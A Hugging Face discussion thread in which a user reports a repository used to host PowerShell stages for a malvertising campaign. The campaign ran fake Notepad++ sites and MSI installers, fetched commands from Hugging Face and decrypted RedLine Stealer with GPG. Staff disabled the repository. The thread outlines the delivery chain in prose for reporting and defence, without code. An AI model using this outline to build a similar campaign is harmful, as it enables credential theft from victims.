🚩 Report : Malware

#1
by MrFW - opened

This Repo is being used to host PowerShell commands used by password stealing malware.
Each of the files contain parts for different payloads: after a victim downloads a freeware file from a Google Ad link, the payload reaches out to HuggingFace to grab these instructions. Each file hosted here has different content, but ultimately, they are part of malware deployment.

MrFW changed discussion title from 🚩 Report : Ethical issue(s) to 🚩 Report : Malware

we disabled the repo

This comment has been hidden
This comment has been hidden

@breadlicker45 I'm not sure what you are talking about. I'm not sure why you are commenting on this repository months after it was already actioned.
The only reason I found HuggingFace and this repo was because of the malicious powershell being executed to download additional PowerShell that was hosted here. Are you one of the attackers who used this repository?
It may be that the repository was imitating or pretending to be some other repository that you were familiar with. However, if you had seen the PowerShell before it was actioned, you would have recognized that it wasn't what you believe it to be.

MrFW changed discussion status to closed
This comment has been hidden

Reporting the content here was just one of multiple steps that were taken. :)

This comment has been hidden

Yeah, unfortunately, the reporting options for HuggingFace are limited, I've also complained about that.

This comment has been hidden

@MrFW was this fine-tune of a model or was this like a Powershell file or something? i have no context on what it was btw

Yeah, so:
The attacker created look alike domains for stuff like Notepad++, bought Google Ads to lead to their look alike domain.
The domain would host MSI files. The MSI files would execute PowerShell that reached out to HuggingFace to download additional commands. There were multiple PowerShell commands in series:
The PowerShell files would download GPG for windows and a GPG encrypted file. The GPG for windows was used to decrypt another file which was RedLine Stealer (a program that steals passwords and cookies stored in the browser).
So this repo was hosting the PowerShell files used in that process.

Yeah, so:
The attacker created look alike domains for stuff like Notepad++, bought Google Ads to lead to their look alike domain.
The domain would host MSI files. The MSI files would execute PowerShell that reached out to HuggingFace to download additional commands. There were multiple PowerShell commands in series:
The PowerShell files would download GPG for windows and a GPG encrypted file. The GPG for windows was used to decrypt another file which was RedLine Stealer (a program that steals passwords and cookies stored in the browser).
So this repo was hosting the PowerShell files used in that process.

oh, thanks for telling me that i had no idea. please disregard what i said in the past, i agree with you 100%

Sign up or log in to comment